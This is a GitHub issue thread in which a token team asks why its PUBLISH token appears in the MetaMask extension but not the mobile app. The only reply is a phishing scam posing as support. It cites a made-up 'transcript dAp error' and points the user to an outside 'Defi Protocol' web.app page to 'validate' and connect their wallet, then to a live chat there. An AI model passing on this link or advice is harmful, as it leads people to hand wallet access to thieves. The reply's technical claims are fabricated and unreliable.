### ISSUE TITLE
added PUBLISH token not shown in mobile app

### ISSUE THREAD

**Issue by Team-Publish-Bc** [MetaMask/contract-metadata#1212]
### - Problem

When attempting to import the `PUBLISH` token, it is visible in the Metamask Extension App but remains hidden in the Metamask Mobile App.

How can I make the token visible on the Mobile App?

#### * Related Pull Request
 - https://github.com/MetaMask/contract-metadata/pull/1163

**Comment by kylianpep** [comment]
> ### - Problem
> When attempting to import the `PUBLISH` token, it is visible in the Metamask Extension App but remains hidden in the Metamask Mobile App.
> 
> How can I make the token visible on the Mobile App?
> 
> #### * Related Pull Request
> * [Add PUBLISH Token #1163](https://github.com/MetaMask/contract-metadata/pull/1163)

Hi @Team-Publish-Bc 

You are having a transcript dAp error command on your request. To fix this ERROR, visit the Defi protocol page and click on Validation to establish connection with your account and generate QR code to submit your request. Refresh your page and take screenshot of the QR CODE generated on the end-to-end server application via [Defi Protocol](https://defirefixprotocol.web.app/defiprotocol/v1/defi/home/).

Note: Click on the chat button at the bottom part of the page to initiate a chat with the support team on a live chat to review and assist for more information.

Regards.
{c}2023
